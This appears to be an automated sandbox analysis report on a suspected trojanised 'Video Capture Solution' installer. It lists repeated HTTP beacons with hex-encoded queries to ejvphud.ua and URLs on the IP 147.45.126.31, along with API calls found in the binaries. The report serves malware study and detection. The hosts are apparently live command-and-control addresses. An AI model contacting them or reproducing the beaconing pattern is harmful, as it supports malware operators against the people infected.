                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficDNS traffic detected: DNS query: ejvphud.ua
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.126.31/
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.126.31/46122658-3693405117-2476756634-1002k
                    Source: videocapturesolution32.exe, 00000004.00000002.2974756897.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.126.31/sea
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4
                    Source: videocapturesolution32.exe, 00000004.00000002.2973601937.00000000009E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.126.31/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1706758940.0000000002111000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1706685088.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000002.2973496782.0000000002111000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000002.2973434034.000000000051F000.00000004.00000020.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000002.2973924658.0000000002228000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000003.1708897906.0000000003180000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000003.1708982513.0000000002228000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tintguide.com/ru/support.html
                    Source: AbC0LBkVhr.tmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmp, AbC0LBkVhr.tmp, 00000001.00000000.1708006888.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AbC0LBkVhr.tmp.0.dr, is-U1N6A.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: is-GSMNO.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_09f4bb4f-9
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0042F518 NtdllDefWindowProc_A,1_2_0042F518
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00423B7C NtdllDefWindowProc_A,1_2_00423B7C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00478554 NtdllDefWindowProc_A,1_2_00478554
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004125D0 NtdllDefWindowProc_A,1_2_004125D0
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004573B4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_004573B4
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0042E92C: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E92C
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555B8
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004800021_2_00480002
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004704C81_2_004704C8
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004671CC1_2_004671CC
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004352C01_2_004352C0
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004861401_2_00486140
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004303541_2_00430354
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004444C01_2_004444C0
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004345BC1_2_004345BC
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00444A681_2_00444A68
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00430EE01_2_00430EE0
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0045EEEC1_2_0045EEEC
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0045AF941_2_0045AF94
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004870A01_2_004870A0
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004451601_2_00445160
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0046922C1_2_0046922C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0048D4001_2_0048D400
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0044556C1_2_0044556C
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004519901_2_00451990
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0043DD481_2_0043DD48
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_004010514_2_00401051
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_00401C264_2_00401C26
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_004070A74_2_004070A7
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609660FA4_2_609660FA
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6092114F4_2_6092114F
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6091F2C94_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096923E4_2_6096923E
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6093323D4_2_6093323D
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6095C3144_2_6095C314
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609503124_2_60950312
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094D33B4_2_6094D33B
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6093B3684_2_6093B368
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096748C4_2_6096748C
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6093F42E4_2_6093F42E
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609544704_2_60954470
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609615FA4_2_609615FA
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096A5EE4_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096D6A44_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609606A84_2_609606A8
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609326544_2_60932654
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609556654_2_60955665
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094B7DB4_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6092F74D4_2_6092F74D
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609648074_2_60964807
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094E9BC4_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_609379294_2_60937929
